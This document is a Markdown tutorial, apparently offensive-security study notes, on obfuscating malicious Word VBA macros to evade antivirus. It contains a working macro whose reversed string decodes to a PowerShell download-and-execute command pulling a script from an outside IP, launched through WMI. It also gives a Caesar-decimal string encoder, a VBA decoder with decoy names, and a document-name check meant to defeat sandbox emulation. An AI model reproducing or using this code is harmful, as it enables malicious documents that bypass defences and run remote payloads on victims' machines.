## StrReverse Obfuscation
VBA contains a function called [_StrReverse_](https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/strreverse-function) that, given an input string, returns a string in which the character order is reversed. Our first obfuscation technique is going to rely on reversing all strings to hopefully break the signature detections.

With the help of [_CodeBeautify_](https://codebeautify.org/reverse-string) we can obfuscate our strings for the _StrReverse_ VBA function.
We will also, instead of simply calling _StrReverse_ function repeatedly, will declare it once, and call it to remain discrete:
```VBA
Function bears(cows)
    bears = StrReverse(cows)
End Function

Sub Mymacro()
Dim strArg As String
strArg = bears("))'txt.nur/051.94.861.291//:ptth'(gnirtsdaolnwod.)tneilcbew.ten.metsys tcejbo-wen((xei c- pon- ssapyb cexe- llehsrewop")

GetObject(bears(":stmgmniw")).Get(bears("ssecorP_23niW")).Create strArg, Null, Null, pid
End Sub
```


## ASCII-Decimal-Ceaser magic
To reduce the detection rate even further, we can perform a more complex obfuscation by converting the ASCII string to its decimal representation and then performing a Caesar cipher encryption on the result.

We can do this by crafting a powershell script.

We do the following steps:
1. We start by creating an input variable called $payload, containing the string to be encrypted.
2. We create another vairable $output, to contain the encrypted string.
3. We convert our payload into character array, using the _ToCharArray()_
4. We run the output of the conversion, through a _ForEach_ loop. Inside the loop:
			- The byte value of each character is increased by 17(ceaser cipher key)
			- We use if/else statements to pad the character's decimal representation to 3 digits.
5. Each decimal value, will be appended to the output string and copied to our clipboard, using the _Clip_ command

The code will look as follows:
```Powershell
$payload = "<string here>"

[string]$output = ""

$payload.ToCharArray() | %{
    [string]$thischar = [byte][char]$_ + 17
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output | clip
```


Finally, we need to create a dycryption routine.
```VBA
Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    Oatmilk = Oatmilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function
```

The decryption takes place as follows:
1. The main _Nuts_ function performs a _while_ loop through the entire encrypted string.
2. _Oatmilk_ variable is used to accumulate the decrypted string.
3. For each iteration of the loop, the entire encrypted string is sent to _Strawberries_ where the function uses _Left_ to fetch the first three characters of the string and returns that value.
4. The _Pears_ function is called with the three-character string as input.
5. The _Pears_ function treats the three character string as a number, subtracts the Caesar cipher value of 17, and then converts it to a character that is added to the accumulator in _Oatmilk_.
6. the _Almonds_ function is then called inside the loop where the _Right_ function will exclude the first three characters that we just decrypted.


## Icing on cake
We'll put one final effor to evade antivirus, During execution, we check the name of the document and if we find that it is not the same as the one we originally provided, we can assume the execution has been emulated and we can exit the code
we'll even encrypt this static document name (runner.doc in our case)
```VBA
If ActiveDocument.Name <> Nuts("131134127127118131063117128116") Then
  Exit Function
End If
```

